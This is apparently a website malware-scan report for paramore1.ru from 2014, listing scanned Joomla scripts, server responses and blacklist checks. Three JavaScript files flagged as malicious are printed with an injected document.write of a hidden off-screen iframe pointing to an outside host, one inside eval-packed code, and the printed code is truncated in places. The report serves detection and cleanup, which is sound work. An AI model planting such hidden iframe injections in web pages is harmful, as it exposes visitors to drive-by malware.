Scanned pages/files
Request | Server response | Status |
http://paramore1.ru/ | 200 OK Content-Length: 57323 Content-Type: text/html | clean |
http://paramore1.ru/static/js/analytics.js | 200 OK Content-Length: 558 Content-Type: text/html | clean |
http://paramore1.ru/static/js/function.file-get-contents | 200 OK Content-Length: 572 Content-Type: text/html | clean |
http://paramore1.ru/test404page.js | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/function.file-get-contents | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/components/com_jcomments/js/jcomments-v2.1.js_v=2.html | 200 OK Content-Length: 27019 Content-Type: text/html | clean |
http://paramore1.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4178 Content-Type: application/javascript | clean |
http://paramore1.ru/media/system/js/caption.js | 200 OK Content-Length: 2350 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
| ||
http://paramore1.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 37030 Content-Type: application/javascript | clean |
http://paramore1.ru/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15387 Content-Type: application/javascript | clean |
http://paramore1.ru/modules/mod_gk_tab/scripts/engine_compress.js | 200 OK Content-Length: 3186 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('19.C("16",5(){$6(".T").g(5(2,i){9 W=2.18("1d");9 $G=$1e["T"+W];9 3=$G["S"];9 b=2.1c(\'.Q-\'+3);9 1f=($G["13"]==0)?11:X;9 4=0;9 U=($G["1i"]==0)?"R":"1h";9 d=b.1g;9 f=X ;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
| ||
http://paramore1.ru/modules/mod_gk_tab/scripts/importer.php_modid=tabmix1_activator=click_animation=0_animationFun=Fx.Transitions.linear_animationType=1_animationSpeed=300_animationInterval=5000_styleType=0_styleSuffix=style1_fixedHeight=0_fixedHeightValue=200_alwaysHide=0.html | 200 OK Content-Length: 794 Content-Type: text/html | clean |
http://paramore1.ru/modules/mod_gk_tab/scripts/function.file-get-contents | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/modules/mod_gk_image_show/js/style3/engine.js | 200 OK Content-Length: 5429 Content-Type: application/javascript | clean |
http://paramore1.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 4644 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("load",function(){ $$('.gk_npro_mainwrap').each(function(el,i){ var TID = el.getProperty('id'); var main = $(TID); var animation = false; var $G = $Gavick[TID]; if($E('.gk_npro_full_interface', main) && $E('.gk_npro_full_scroll1', main)){ var offset = $E('.gk_npro_full_scroll1', main).getSize().size.x; var scroller_main = new Fx.Scroll($E('.gk_npro_full_scroll1', main),{duration: $G['animation_speed'],wheelStops:false}); scroller_list.scrollTo(0, 0); actual_list_page = 0; }else{ actual_list_page++; scroller_list.scrollTo(actual_list_page * offset_list, 0); } }); } } }); });;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paramore1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: paramore1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paramore1.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paramore1.ru/
Result: paramore1.ru is not infected or malware details are not published yet.
Result: paramore1.ru is not infected or malware details are not published yet.